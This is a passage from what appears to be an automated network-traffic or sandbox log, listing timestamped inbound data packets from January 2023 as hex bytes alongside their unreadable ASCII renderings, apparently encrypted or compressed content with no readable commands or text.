rAW@1Tk{scy5r@[[9poT`8MUOT%-tn@vFAn0;wKb>A![xOf^>)Euk6/a0oELgmX1#Ft!SDUc.DxY:5&?!8m]OM'=FsV$&/+Q,H^
2023-01-03 15:29:20 UTC	1668	IN	Data Raw: 09 d6 7b 52 fa 1a fc 6b 86 84 24 c1 41 f4 c0 66 2c c3 00 90 12 f4 66 14 d2 a6 44 bd 54 c6 04 64 45 43 52 e8 1f e0 78 5d 65 a0 53 3a 91 c0 ee 1b 51 6e 44 69 47 69 81 7f 64 a9 c0 ee e8 fc 47 d8 ed a4 68 89 5b 92 a1 ac a8 35 77 58 61 16 e9 95 be 40 6c b6 10 cd e4 39 ac c6 1c 40 0e 2c 5b 13 13 9e 0a ca fb 13 e4 ea 09 07 ec 32 6d 74 1d 8e 9b 19 f8 e6 08 39 de 83 3c e2 f9 0f 70 bc 39 12 e3 14 02 39 ab 37 c9 71 6f 6a 30 d7 5d 22 4f 12 24 74 89 d0 60 c8 5e 48 22 f6 9b 33 88 a5 48 f3 db 92 83 57 ca a1 3a 88 fc 54 47 25 47 11 47 1c f0 c2 39 d0 86 33 c3 10 a3 43 af 40 8d 4e f8 0a 3d ec 62 e8 b2 65 15 44 c1 c6 df 80 22 2f 94 05 e1 7f 09 c7 cb 93 3b 9d a8 10 ae d0 e8 2f d0 d0 05 9e ca 51 3d e2 f7 60 b6 2b 9d 34 75 65 46 ca 11 c5 4a 83 36 c4 09 ec eb 9a f6 e9 22 b6 1a Data Ascii: {Rk$Af,fDTdECRx]eS:QnDiGidGh[5wXa@l9@,[2mt9<p997qoj0]"O$t`^H"3HW:TG%GG93C@N=beD"/;/Q=`+4ueFJ6"
2023-01-03 15:29:20 UTC	1669	IN	Data Raw: d7 ac 20 09 db 22 93 ba 53 5e ae 41 a4 2f a0 04 49 2c 05 23 20 10 09 ec 6e 96 ec 10 11 7d 0c 01 32 cb 08 a7 9e 5c 4a 4b e7 87 b6 08 24 4d 22 ea 80 f6 de 0b a2 f6 3c 3b 6e 05 90 b4 20 7f 3b c0 53 0d a1 2e a2 d8 46 45 09 6b 13 70 ed 22 8d 33 0d ce d3 3c 38 f8 1a 63 9d 0f e7 fd 0e 2d 61 07 e4 e1 43 de 32 57 3f f4 0f d0 80 4b ab c4 14 86 66 08 4c 20 8d 3b 1d 8c f8 d3 c0 60 41 b5 57 be a3 ff 7b c1 2f cd 09 5d 1b 1c 56 ad 61 67 52 49 80 98 f6 08 46 75 36 3f 8e 49 6b 6c 77 1a 10 d7 09 10 e2 00 98 71 81 99 59 6b 56 c7 59 0d ad 5b 00 98 65 a2 63 10 bf fd 0e c4 66 41 3d ce 27 20 d8 45 3c 02 2e f4 44 87 79 ba 79 22 db 80 e6 cf 20 d5 7e 86 8e fa 3a 66 38 2d 74 50 62 7f 12 e4 91 f4 b9 75 71 82 c4 82 e2 e9 43 02 76 86 f8 6e 52 ec ec d5 5f 3a c2 94 d3 2a 7c 4d 09 ab da Data Ascii: "S^A/I,# n}2\JK$M"<;n ;S.FEkp"3<8c-aC2W?KfL ;`AW{/]VagRIFu6?IklwqYkVY[ecfA=' E<.Dyy" ~:f8-tPbuqCvnR_:*\|M
2023-01-03 15:29:20 UTC	1685	IN	Data Raw: 1f f5 7d 67 6c e3 a7 d4 4c 0f 4c 5c a7 ce d0 0f 97 ce 27 99 64 98 1e bb 8f d8 c4 95 62 ab 12 5b ad 6f 85 61 dd 9a fd 80 09 0d 41 5f df c0 a6 09 e0 2d f9 5d e5 28 9c fb 20 ed bc 47 84 8f 54 11 0b b9 5c cd 78 6c 8e 05 38 4c 69 72 5f e0 dd 8f f0 ef 19 21 c8 0d 09 48 5d 55 d4 d3 69 0f 24 6a b4 b5 82 b7 58 d1 06 32 f1 0e 70 96 54 e5 7f 87 a2 fe 48 82 7e 94 86 84 cb 5f 52 25 66 d6 c3 87 09 25 19 d7 5e cd 87 7f 22 dc 3d 13 05 59 31 54 77 a4 a2 6e 13 74 16 a3 ed fb 51 3b 53 71 25 e5 65 eb 6f fd fd 81 5a e3 cd d9 39 17 3c d0 55 0d 77 84 70 bc d3 b1 b4 68 bb 76 5e d5 37 51 44 5e b8 e8 8c 49 a4 2d c9 3f 58 cc e7 f0 f7 47 d5 74 8d 2d f0 d6 6a 1e ab b3 de d5 fa 59 28 66 98 26 d1 21 2a be 76 f0 85 b1 ba 3d 08 e4 a9 4b fc 89 6b f3 15 44 b1 40 96 34 c1 60 9f d4 34 43 55 Data Ascii: }glLL\'db[oaA_-]( GT\xl8Lir_!H]Ui$jX2pTH~_R%f%^"=Y1TwntQ;Sq%eoZ9<Uwphv^7QD^I-?XGt-jY(f&!*v=KkD@4`4CU
2023-01-03 15:29:20 UTC	1686	IN	Data Raw: d1 ce 5a 2e c0 e0 3e c0 40 2b ea be 30 45 65 a6 be 7e c3 77 96 39 71 ee 24 26 7e 19 87 fa 2e 93 fb 46 66 e1 07 fc 25 8c 40 1a 32 ae ae 50 74 01 dd 5b 3b 4b f7 ea e2 ad 46 e9 d2 2a 4f 2b c6 1a 4c 22 73 65 6e 48 14 7d 50 9f ac 81 b4 0f 2c e3 5d a1 1d df 74 dd 35 f4 db b9 23 70 4b 98 b1 30 ea b4 eb f4 fd f0 42 6a 94 85 b7 bc ab 4d 46 de 1a d3 41 dd 6f 7e 21 08 cd fd 61 ae 0a 09 b4 b9 68 f4 2d fc cc 3b b9 80 05 7c 21 85 4e 39 5b 1e 54 2a 3b f5 f7 99 22 ed 9b 9e 6f 49 85 9a 56 f6 cf 5d 86 cf d6 dd 9e 51 6a ee c2 2b 3a 66 6e 05 18 74 35 22 af 92 84 8e 4a b6 67 4e 9f 9b 78 9d 7e 21 7b 6f 1d 39 05 84 de 5c cd de b0 73 de c8 3b 2f d5 36 6d c2 d2 1a 38 61 25 c6 e3 06 ab d2 34 f9 2f e3 50 aa b2 00 04 4c 7f a6 3f 0d 2d d6 29 d7 c5 b7 c6 ad e9 91 7d 09 05 5b 52 8e a4 Data Ascii: Z.>@+0Ee~w9q$&~.Ff%@2Pt[;KFO+L"senH}P,]t5#pK0BjMFAo~!ah-;\|!N9[T;"oIV]Qj+:fnt5"JgNx~!{o9\s;/6m8a%4/PL?-)}[R
2023-01-03 15:29:20 UTC	1702	IN	Data Raw: b0 6d 1e 42 1a 2a be 74 35 d5 39 7a fb aa f2 d3 18 4f d7 87 b4 af c4 56 3c 33 b6 4d 48 7b fa 3a d5 86 47 be 87 cf 2f d4 36 cf b2 fd 2e c9 5d ea 91 d5 3c 12 30 05 07 59 19 73 d5 81 81 0f d0 87 03 b7 d2 5c 48 cd 46 f1 59 25 23 49 89 fe ba 88 2a f5 1b de c5 6f 6e f3 11 19 cb 37 55 e4 12 c5 f2 e5 05 d5 7e 87 28 96 62 1c 51 ce ed 96 60 e3 3f fa b9 5c b4 f9 64 a2 ae ee af 63 e6 3a 26 cf 94 19 eb 2e 64 42 a6 7d f5 5b 0d c8 b9 f5 fd 88 3f af 00 ad c2 44 f5 32 69 71 4d 73 d1 32 20 a2 0f e6 9f fb f7 33 70 d2 33 5d cf 9d a8 cd 83 cb b5 e2 ab 8c 29 13 72 d0 91 77 93 6a 6a 74 a9 97 e4 93 f7 b8 d7 23 c8 f6 4c 83 34 e4 61 3c 23 9f bf 07 01 dc fb 0c 4f 42 84 1a 70 95 b9 45 b1 75 ab 7c cb 86 4a bb 8f f6 da a4 ad 2e f9 ce 4b c9 72 9e af 14 86 35 58 7d 0a 79 9c 05 02 34 35 Data Ascii: mBt59zOV<3MH{:G/6.]<0Ys\HFY%#Ion7U~(bQ`?\dc:&.dB}[?D2iqMs2 3p3])rwjjt#L4a<#OBpEu\|J.Kr5X}y45
2023-01-03 15:29:20 UTC	1703	IN	Data Raw: 92 dd 30 f3 d1 57 9c 93 6b ad 76 d5 99 37 c5 a4 f7 ad 95 a5 c7 33 65 48 39 a5 95 1a 80 a2 f6 b0 98 0e 64 ee dc 45 b6 91 ae 57 a5 1d a9 82 07 ea c8 84 6d ac 21 46 1a b7 85 38 a4 aa 41 2a 59 14 d8 bd 04 87 d4 af ce 6f d9 76 db 2c 94 b9 87 55 a3 3a a9 81 9c 07 ec df 53 87 cc 48 d0 d7 45 74 e7 25 91 a5 03 87 50 0e c7 b9 55 d9 3d 53 7c 15 e5 97 64 29 07 2e 01 5e 45 cf ec 27 23 2a e4 2e fc 30 fa a5 10 74 fe 6a 5a e4 0a ca d0 e1 4d 59 c8 3f 6d 9b 88 53 46 54 55 80 95 a7 ec 53 61 c0 e5 3b 56 f1 33 ae 82 1b 75 eb c0 f5 b6 74 cd 7e 13 40 9c aa 56 2a 74 ca 09 0b f3 10 e3 b6 ba d4 5d 45 da c2 82 6c 85 52 d4 b9 86 d4 a5 2f 69 21 07 23 8b ce e3 88 db 4f 7f 7e 4e 33 79 80 7c d7 7d f9 36 63 fe 85 4c a7 87 5f db 28 7a 48 94 5b af 76 d8 29 b6 33 e3 21 a6 ac e8 89 6b fb 01 Data Ascii: 0Wkv73eH9dEWm!F8AYov,U:SHEt%PU=S\|d).^E'#.0tjZMY?mSFTUSa;V3ut~@V*t]ElR/i!#O~N3y\|}6cL_(zH[v)3!k
2023-01-03 15:29:20 UTC	1719	IN	Data Raw: 0a a7 01 8a 30 8d 9c 48 f3 6d 2d b5 38 35 48 60 83 e3 37 0d b6 da 47 c8 78 0b aa aa 89 0d 9f 2a 56 9b f2 d4 6a 06 3d bc eb 6b bf 0c b3 28 c6 21 d0 8f 8e b2 86 c9 be 15 57 fd 81 60 f9 0c 22 f3 c9 c7 f5 21 8a ee c2 6c 86 6b 17 76 09 64 b7 37 f3 78 87 3a bf 76 9b 40 56 fe 73 2e 1e 25 c1 36 fd bb e9 d9 ab a7 2b 9c 82 6d fa bb a3 da a1 65 23 9d 43 e2 4e d5 2a 4f 90 f0 a6 5a e4 49 d9 df d1 3a 34 f9 10 5f e2 a0 f0 3a 51 ca 11 9b 79 24 c0 4c 9a 8e 11 91 e6 0d 5e 2c 43 6a dc e0 ee 38 c3 3a 5e 00 87 4f 5d a1 43 e3 21 a6 50 8e 9d f4 a5 0f ac de c4 0a 7f 72 67 5c c1 24 9f a3 44 33 9c fd df ee 99 29 1e b2 ec 78 5c 6a bd 42 d3 52 35 01 61 8f f1 69 11 25 9f 43 29 bb ea a0 9c 68 83 bd 5d 73 a1 be 2e 4b 74 98 e2 a5 12 cc 67 aa 3a 3b 21 8d 3c 35 95 fd ef 4f 7c 01 c8 9a 91 Data Ascii: 0Hm-85H`7GxVj=k(!W`"!lkvd7x:v@Vs.%6+me#CNOZI:4_:Qy$L^,Cj8:^O]C!Prg\$D3)x\jBR5ai%C)h]s.Ktg:;!<5O\|
2023-01-03 15:29:20 UTC	1720	IN	Data Raw: d0 d7 21 5c 60 ea 90 48 a9 7f 77 de 50 d1 c5 76 01 57 c9 08 1f 38 ea 18 0b c2 48 3f 1c 00 6f b2 dd de e9 a3 0e 0e c2 15 e8 e0 53 aa df cd bf 4b e5 97 37 d5 b2 0e 09 ff 56 c7 1d b9 15 9a ae fd 2c d5 da 17 a5 5b f5 af ff 5f a6 6b 09 a3 80 2e 14 d2 3b a8 e9 c6 94 9e 0d e4 e5 43 cd 96 e4 b9 77 e8 a8 2e 69 1b 4e b5 4f df 4a 8e 07 d9 83 23 59 55 73 ba ab 2b d5 d2 b5 f0 8d 5e bc a1 56 68 c5 64 fe 4e 5b a1 f3 3f 52 f9 a5 08 c2 57 cc 0c 5b d8 fd ab b9 71 5f a8 fe 1d 6e 79 21 14 f9 c6 38 d4 ad 20 cd af 98 ec 78 27 b2 e1 5c 39 de b0 e6 d2 64 24 6b 6a b8 b1 ab e8 5e 0e fd 1d 0d d2 0b b5 fe 2d cd c7 25 ac 20 29 cd 12 48 3e 8f b6 6a e2 b3 6f 54 8e 13 6c de 02 0f bd fb 55 fa 37 bd ba 07 21 28 1d fd 62 41 65 79 ed f0 6d b8 1a ca 76 64 d9 2e f9 06 fe a7 b9 88 ab c6 37 d5 Data Ascii: !\`HwPvW8H?oSK7V,[_k.;Cw.iNOJ#YUs+^VhdN[?RW[q_ny!8 x'\9d$kj^-% )H>joTlU7!(bAeymvd.7
2023-01-03 15:29:20 UTC	1736	IN	Data Raw: ec 52 8f d2 a6 0c 9a 79 a0 d0 cf 0a 5e 9b 88 66 1b ba ff 1b b1 b7 6d 56 e7 a5 9e 24 47 e5 b6 c0 37 ee 3c e7 dd b8 ee fb 2d 3a 73 ef ac 86 fb f4 f4 37 e3 2e f7 a6 77 69 16 a7 be 5b 3d 76 06 da 3e 8e 3d 6c dd 56 bb c4 c4 b0 60 9f 3f 72 b1 d2 74 2a 7d 2f 7c a2 4b 3b 12 6d 5b 76 e9 87 6c fb 19 35 f7 4e d6 cf 63 5c 1e 3b 80 ed 1d b3 5a e7 69 f1 66 36 30 25 80 54 91 20 bd c1 7a f4 8e 7b 7c d3 3d 2e 78 bf 9e ad de 2a 3a 9c ff f0 ad 94 3d e7 05 b8 81 24 90 71 8c 5a 2e 3b d6 96 cc 5c 6b 1b fc 47 8e be b4 3e 23 2b 28 e8 cc 10 7d ec 88 b8 d7 fa 17 98 7c 67 b6 0c 64 8d 0c 1d 30 e3 a7 27 eb cd b6 8e 60 a4 7b 8e fb 8a 66 84 ea 05 1f ff d4 8b d6 11 02 fb 46 d9 d1 b4 78 e5 93 b7 70 4a 94 b6 e5 66 1d 00 49 4e 5d f0 94 a7 7b 40 a4 55 56 b0 76 0a cd a9 53 65 cc 7a 14 54 1e Data Ascii: Ry^fmV$G7<-:s7.wi[=v>=lV`?rt}/\|K;m[vl5Nc\;Zif60%T z{\|=.x:=$qZ.;\kG>#+(}\|gd0'`{fFxpJfIN]{@UVvSezT
2023-01-03 15:29:20 UTC	1737	IN	Data Raw: 7a 1e b3 1a e7 b9 4f 9a 15 d9 31 80 0e d5 7e f5 ff 29 32 fd 2e 22 e1 d4 1d 98 92 89 ee 69 84 4b 16 3b 95 91 db af 50 b0 0b ca aa b2 9c fc 82 35 1f 43 6d 54 57 79 3e 11 92 3a 31 dd bc 71 77 b4 a5 df 8f 94 b2 21 6d d6 8b 62 52 e3 92 78 e7 c8 1e 8b 73 28 3b 52 fa b6 ff 84 48 fb be 41 e2 5d 94 c7 b5 91 75 f6 2f 90 e9 95 dc e8 3b 48 73 9d 33 70 64 3c ce 42 2a ce c4 5f 6d a9 aa 1a ee cc d0 0e e7 b9 30 b8 89 b9 6e 6e fa 5b c0 02 e7 7e 5a 92 82 fa 0a ab 28 63 13 d6 74 58 93 b8 5d f4 21 c2 35 2f 54 d3 8f 76 31 2d fc e6 96 6c 84 13 23 4d 58 4d ff ac 4d bb 74 40 ff 2b 6d d2 03 45 d7 0a 7e df d5 19 4d 41 51 77 74 39 c7 f2 f9 92 99 70 66 49 dc d8 f7 cd 8b 3b 7a f3 ec 4c e5 43 dd 6a 44 2b 22 06 0e 8e f7 0b 88 74 0e 48 d1 94 36 75 24 2d fb 46 0c 7b 0a 32 79 2e 2e 6c 67 Data Ascii: zO1~)2."iK;P5CmTWy>:1qw!mbRxs(;RHA]u/;Hs3pd<B*_m0nn[~Z(ctX]!5/Tv1-l#MXMMt@+mE~MAQwt9pfI;zLCjD+"tH6u$-F{2y..lg
2023-01-03 15:29:20 UTC	1753	IN	Data Raw: 16 92 8e 4b 71 3b 2f 4b d5 13 ea e7 28 32 7a 15 e1 01 27 f4 28 5b 63 f1 bb d4 cb a4 4d 4a 7a 8a 2f 94 c2 a3 70 fd 8c ea da 36 28 74 a0 d6 5b ed dc c8 89 fe ac c3 b9 b0 a4 2e e7 ff de b2 98 4c a0 19 a7 ac e7 43 1b 02 d7 92 89 fa 56 0b 7c 42 d7 53 82 0f 9a b6 ee ac 68 fb 36 9e c0 10 8d 3b f3 38 74 99 a3 8e dc 96 03 cc 30 01 12 b6 58 ff a6 61 ab 8e fc bb 63 70 3c 46 15 bc b8 7c cf 4e a1 86 59 60 15 43 ed 8e 08 7e 1a b2 64 f6 c4 19 17 8a e8 95 5b dc f6 46 4e e9 da 7b ce a9 10 92 d0 66 5c 18 8a f5 09 82 e7 a5 9f fa c7 d0 53 8c 79 91 f9 6f f2 f8 cc f1 11 16 3a 7e c7 90 77 e9 3c 86 11 8f be 57 95 fa be 5c c9 05 4a b0 bd 62 34 69 f4 34 60 6d 8a bd 0e 84 3a 58 f0 8a 68 de 39 6e bc 28 ea 74 0b c0 ec a0 14 0e 44 8f 9f d2 20 5e 18 70 73 5a d2 90 47 f5 60 49 5c 0e a1 Data Ascii: Kq;/K(2z'([cMJz/p6(t[.LCV\|BSh6;8t0Xacp<F\|NY`C~d[FN{f\Syo:~w<W\Jb4i4`m:Xh9n(tD ^psZG`I\
2023-01-03 15:29:20 UTC	1754	IN	Data Raw: c7 d5 17 13 49 ce 0b fd c8 cf 98 e6 11 db 51 18 a5 38 cf ee 35 38 4b 43 6a d9 2b 37 41 89 85 1d c6 69 d4 d2 4a d9 ff ce 20 9d c7 8c cb 90 02 bf f5 7b 4f f5 d1 59 c0 d2 98 7c b8 8c 8f 7c 51 82 6e d1 b5 03 ec f6 69 5c ad b5 72 ec ac f1 9a 19 1d 44 15 73 74 f0 52 4d 74 03 d7 3c c2 b7 7a 9f 63 ce b9 03 df 41 c5 d8 73 e2 ea 5f 13 84 be c6 ae 79 ec 6f 3f 50 2a 5e f0 de bf 12 34 34 09 4b 4f b4 78 4f a8 b4 2d 77 4e da 77 fc 2b 99 c7 65 20 d7 ce 9a c6 73 7a f2 1b 16 b3 77 7c cf 27 a6 f4 9a 48 ea 32 d2 6c 75 af eb 41 ab 5b 46 42 1e 51 69 4e 28 27 17 1c 7a 39 a0 ee 23 5b ef 05 b0 f9 1e 7c 91 e6 6c 2e eb 7e ee c9 c7 17 10 a6 94 5d 2a 69 9e ab 0a ef d3 1d cb fd 0b 81 f8 ad b7 f3 9f 65 1e a7 59 13 1e d1 fe 7b 44 e2 4c ba ec 3d 1a b1 e6 6d cd 21 e2 4f 3d e1 0b d6 cb 15 Data Ascii: IQ858KCj+7AiJ {OY\|\|Qni\rDstRMt<zcAs_yo?P^44KOxO-wNw+e szw\|'H2luA[FBQiN('z9#[\|l.~]ieY{DL=m!O=
2023-01-03 15:29:20 UTC	1770	IN	Data Raw: f5 a8 09 0f f1 a0 f9 bf e1 08 9c 1a ed f6 3e ed 93 54 fa 89 44 a6 92 90 b9 17 5a fc 27 5d f0 92 32 fd 19 4c 34 f4 8e 2c 7d c2 07 42 be a0 ff 3c a1 31 df 49 c7 6f 48 16 2a 50 e7 0c 40 e3 6d d7 28 54 ed 27 9e d0 a4 72 3c f1 42 df 10 40 8d 55 ea 06 d0 ff ca da 8f 34 e5 4d 02 86 ef 00 27 97 de e7 96 91 bb e0 f3 8e 34 2d 13 c3 e7 42 b2 cc 1b c2 ba 28 bd b9 2f 91 69 41 a9 ff 80 bd 78 25 bc bc f0 5b be bc ff 7d ce d2 0e f0 a5 2c 61 e6 56 56 e8 91 37 be 84 bc 6b c6 55 3a 39 7d 75 15 78 33 f6 fb 0a 9e c5 a6 fd 2e 5d 84 de ff 83 22 f4 32 66 55 f4 e9 3c 4b 1e ac ba 2e ef c5 c3 f6 66 51 f3 4a fb 7d 4b b0 7e 49 0f d1 20 83 ef 11 e4 d7 70 d1 59 17 a4 ef e1 1a 88 6e 7a 23 2a 6c c0 bf aa c2 be 9a 56 da 95 1d 6c 47 0c 12 23 81 a8 f3 18 dc f3 cc f2 da 75 58 16 45 18 5d 28 Data Ascii: >TDZ']2L4,}B<1IoHP@m(T'r<B@U4M'4-B(/iAx%[},aVV7kU:9}ux3.]"2fU<K.fQJ}K~I pYnz#lVlG#uXE](
2023-01-03 15:29:21 UTC	1771	IN	Data Raw: ff 1c ce fe ee fd ac 6a 73 56 9e d6 85 31 a9 a4 cd 4f 4e 9b 5b 9a b6 ef 9d 12 95 48 79 86 35 07 95 10 1f fc 22 22 a9 2d 7f a3 09 17 4b db 3d f2 22 af b0 ec f8 bc 82 ad 3d ab 5e 57 a0 9a 3b 7f 27 cc 2a 2d d8 d8 5c 59 09 60 69 81 56 ff 20 61 23 ac df bf 8f a1 d8 77 be ce 02 30 73 4f 20 d5 88 6b 60 7a 6a ff 3b ef d8 92 28 fb 24 f6 20 af 24 8f 61 fd ff 3c fa 05 2f d4 cb 8d a8 ab 33 52 96 13 cf 7b cd c1 3e 24 6f 48 20 ae ac 4c 91 47 37 be 03 71 db d8 f3 d5 d3 31 df 73 81 e5 f5 9b 57 8e ee a9 bc c4 03 a8 ab 41 b6 9e 33 65 b5 40 21 39 82 9e 84 21 3f 23 46 9a 38 8f 3e 34 0f 89 62 65 69 e3 cb eb 8f c0 a0 f8 c3 f2 56 62 bc 13 45 47 db 07 79 73 f7 ee 99 27 8e a0 bd 63 8b 97 3e 28 1e 82 f0 ba e2 f8 ba e5 62 f9 34 96 3e 7a a1 5b 82 cc 6a be 42 70 ed 8f d5 d1 8c 6e a6 Data Ascii: jsV1ON[Hy5""-K="=^W;'*-\Y`iV a#w0sO k`zj;($ $a</3R{>$oH LG7q1sWA3e@!9!?#F8>4beiVbEGys'c>(b4>z[jBpn
2023-01-03 15:29:21 UTC	1787	IN	Data Raw: 9c 44 a0 53 35 9d 0e 70 91 59 4a 92 26 8d fa 33 90 ab 41 d5 f2 ac af 1e f0 27 3c f1 de f5 34 b4 77 66 86 ad 95 60 1d 22 eb 6b 65 e2 d3 d7 2a 9b ad 13 79 e7 b5 d3 fb 68 f2 1c 8a e1 5d 01 9c 6f 84 cb 4d f0 01 05 47 e5 0a 9a f9 2d c9 bf af 9b 0a 61 bb 81 d1 cc 69 76 8b 7a b2 3f c9 de d6 9a d4 b2 95 0a f4 c8 50 71 45 7c 79 cd 7d ff aa 91 3b aa aa cf 88 ae a9 8f 22 43 56 53 31 70 6f 89 92 6f bd 9e 57 b4 7c 5d 6d 5f 97 f7 fc ce a8 f1 0e 9f 6e a1 be 92 a8 ae 1e 31 7c 56 6e d0 9d 0e a7 e1 4c 0e e0 e3 a7 3c 36 97 b6 87 ac 9c 8f 3d 88 aa a0 8b 09 6b 84 5a 38 cc 90 4b 91 d5 3b 9f f1 11 67 c5 79 cc a4 e4 7d e8 56 de a9 6f 37 3e e8 92 d0 90 13 52 d4 19 10 a1 09 d3 d9 00 2c 72 e4 44 75 b4 e1 17 84 3c 83 bb 6f ea 4b a6 da ba 81 35 07 9f ba ad 94 74 cf b4 bd ca 45 59 82 Data Ascii: DS5pYJ&3A'<4wf`"ke*yh]oMG-aivz?PqE\|y};"CVS1pooW\|]m_n1\|VnL<6=kZ8K;gy}Vo7>R,rDu<oK5tEY
2023-01-03 15:29:21 UTC	1788	IN	Data Raw: 74 c4 49 83 79 12 b3 48 9e a9 b1 33 8e 42 5d 26 44 13 be 52 d5 5d af 04 03 5f 51 67 7d 0b ab d9 39 fd 39 e1 4e 55 fa dd 3a c5 c8 bb c8 d2 1a 82 b0 e4 27 6f d8 f7 b3 73 1c ce e3 d2 b8 9a 70 b0 be 19 71 a9 6b b9 8c 63 ce c8 a3 4e eb 71 92 1e ec 83 b2 65 c8 67 f7 04 2f 4f eb 79 b6 de 95 9d fe 64 48 4f f0 4f 51 7e c9 e5 f9 a3 4c f9 57 c2 d8 27 af c9 89 92 72 e9 82 bb e6 6d 3f 28 03 5f a2 0c fa 06 9b ad 15 40 43 bf ec 8b 5d 20 05 5d cd 92 85 bb c6 f1 9e 92 fa f3 2c 48 e9 13 8d 1c a6 d3 21 6d d4 18 13 3f 73 49 dd 68 46 cf 24 02 75 15 9b 97 e8 d8 2d 1b d1 5b ba 8b 7b 12 86 4b e3 44 59 09 98 eb 73 de cc aa 49 b2 f0 86 e8 a8 66 ea ec fa 00 a7 5c cf 0f cc 82 4f ea eb b3 c1 e7 de 95 f8 89 05 0d a9 71 15 56 92 2f bd f3 47 c4 55 8a 04 d3 af 96 30 7d 40 1b f7 12 67 67 Data Ascii: tIyH3B]&DR]_Qg}99NU:'ospqkcNqeg/OydHOOQ~LW'rm?(_@C] ],H!m?sIhF$u-[{KDYsIf\OqV/GU0}@gg
2023-01-03 15:29:21 UTC	1804	IN	Data Raw: 39 7f da 43 69 3b e5 dd 68 42 2a 18 c7 4b 28 83 0d 07 e8 a9 8e e6 46 79 58 98 43 7b 6c e4 6f 62 54 57 ba df 10 99 fd 4c 28 74 25 29 68 82 b1 bf d0 5d ec e4 96 9c b8 b8 b6 40 80 a6 36 76 45 ee 73 64 f1 bd 50 c4 3a 3e c4 57 6c 68 cf 3c 79 41 d7 f8 46 82 17 e8 c1 95 59 75 e5 89 7c 83 20 fa 00 ae 0b da f2 37 61 39 99 68 23 ae 10 29 95 09 bb 17 86 af 15 ea e5 ec 1f 3e fb 00 bd fd 48 3a 0b a1 86 9f 18 68 db 7a c7 a4 e2 5d 53 4b 3d 71 a5 0d e2 2e d5 13 c1 16 33 df e2 84 2a af 42 aa 70 4e c2 5b 97 76 35 86 49 f7 b1 81 2d 43 d1 9e 6e e9 8c 72 e9 a8 6b bd f6 d8 fa 5e d4 a3 71 a9 41 17 90 f5 70 db 34 b9 1b 5b 16 2e 70 3f 41 70 d4 77 31 15 74 de 1b d6 c4 3d c3 e2 d4 9f b8 82 4d be 46 50 a1 a5 a1 cb 91 43 9c c8 85 0e 96 f2 77 56 db 60 6f bc 51 8a 4e 9d f8 a9 f0 a5 b1 Data Ascii: 9Ci;hBK(FyXC{lobTWL(t%)h]@6vEsdP:>Wlh<yAFYu\| 7a9h#)>H:hz]SK=q.3BpN[v5I-Cnrk^qAp4[.p?Apw1t=MFPCwV`oQN
2023-01-03 15:29:21 UTC	1805	IN	Data Raw: 2e d6 06 22 22 68 08 9b 46 90 81 18 a5 62 dc 9d bf 41 58 dc 1a e3 07 62 e8 72 ce 69 86 68 a2 05 9e 7d f4 da 3e aa e7 4d ba 90 ae 6e e0 1b 04 75 83 db 6f ea 80 4e bd 4b 1f 60 dc 33 38 46 13 54 9b f3 31 ce 8d 48 19 bd c7 15 33 cd b3 b7 b4 a5 7e 6f 01 52 2b 72 cd 73 d2 fa 15 63 62 57 72 4a 8d ae ec 5a f7 72 8d 48 ec 1b f4 d6 b2 ed 6e cc a0 f7 d4 bd a7 54 59 23 a0 ed 8f 2e 3c a4 14 66 e3 b4 89 74 a8 c8 b1 7f f3 0f 86 6a d0 b5 c8 d0 4b 37 74 c1 2b 1f ce 77 93 bc 25 64 5b 6d f4 cd 65 09 9c c9 7f b6 5d 8f 61 bc be 62 ff 7e 42 54 e4 69 5b 2f bd f0 d7 4c 58 63 2a a8 0f 0f e7 48 50 3f 22 66 a8 69 0a af c9 d2 5a de ae 37 e7 71 03 ea da a1 1c d2 2e bd 95 0b e8 d2 f8 72 8c fb 81 6a 18 97 3b 6d eb 25 4c b3 66 b9 dd 57 24 c9 5e c8 23 3e 98 01 13 17 fe 98 ae 24 15 a3 06 Data Ascii: .""hFbAXbrih}>MnuoNK`38FT1H3~oR+rscbWrJZrHnTY#.<ftjK7t+w%d[me]ab~BTi[/LXc*HP?"fiZ7q.rj;m%LfW$^#>$
2023-01-03 15:29:21 UTC	1821	IN	Data Raw: 7e c2 b2 b7 55 26 f2 7e fa 2b 01 d3 9f 66 c9 ad 71 2d cf d2 32 03 86 b5 b4 8e 37 9c 69 09 2a 99 f3 be 5c 63 a6 b6 f2 12 4f 30 3f 0f 82 12 6e 09 d8 ba 0a 56 8d 4f 6e e1 bc 1f 34 ca e5 b8 4c a6 69 b0 1f b8 e0 f7 ba 9f 81 60 be 6f cd c5 df e0 55 21 76 2a 99 48 47 60 36 1f 9d 8e ad a3 ff e0 45 2c 52 59 75 15 9b 67 83 f0 a5 2f f7 a6 5c cc 88 34 5f 79 05 32 2c 29 6d 17 cf 9a 66 fa 47 0c 3f 20 c3 3c b8 a7 4f ed e2 0e 2b 93 ab ae e4 15 84 e6 d6 8c d9 07 61 de 72 80 a5 35 73 0d 13 e2 0b b6 7c 84 ac b8 c0 bc 96 bd 81 67 7f 96 bf 76 80 36 bd 63 96 27 69 48 8d be c1 3f 5d d3 b9 7c 33 b8 64 a5 9f 5d 52 9a 77 24 8a bf 50 bc 3c 3b bb 0d ac eb 87 36 b8 8d 4c c9 a2 c0 4f 28 d9 df 7c f8 05 bf fd 67 cc 62 de 38 f1 5d d1 38 73 7f 6a 05 e8 98 92 4d 3c fc 19 fc a7 58 98 10 9e Data Ascii: ~U&~+fq-27i\cO0?nVOn4Li`oU!vHG`6E,RYug/\4_y2,)mfG? <O+ar5s\|gv6c'iH?]\|3d]Rw$P<;6LO(\|gb8]8sjM<X
2023-01-03 15:29:21 UTC	1822	IN	Data Raw: 0e e7 c5 26 5d 93 66 bc d3 09 de e9 c8 d7 bc c5 13 43 52 c0 2b 6f 34 7c 43 52 cd 67 2c 55 8a 04 a2 c0 22 93 50 cf 33 f3 e2 4c 8f 7d 07 5e eb 40 f2 df 20 3e 6d 82 b6 41 fc b8 3f 21 3b 4f 7c 14 65 8b 80 df 0d 4e 6d fa 98 13 d4 4b 43 34 4d 03 b2 34 d3 93 bd 98 4d 67 bf a3 4f f6 57 f6 96 73 23 70 41 3c 6b f1 46 5e a5 2f 69 c4 37 fa 87 b1 0e 64 23 d9 f7 c4 0b 79 1d ab fd 06 17 b3 e7 a7 ac 41 2c 46 ec 46 03 04 d5 58 17 92 a7 ba 3b 23 0e 5d 40 41 02 94 d9 16 1a 5a d6 51 a7 4d ae 63 67 6c 61 24 bf c6 ba df 53 0c be 6a c6 3e 8d fd 05 86 93 37 4b 5a 76 51 2e df 40 06 9e 09 92 cc 09 62 18 33 22 be 31 5c 95 04 e9 5d 18 f0 bf 91 c6 59 48 e5 97 1e a3 2f b2 a0 05 04 78 a5 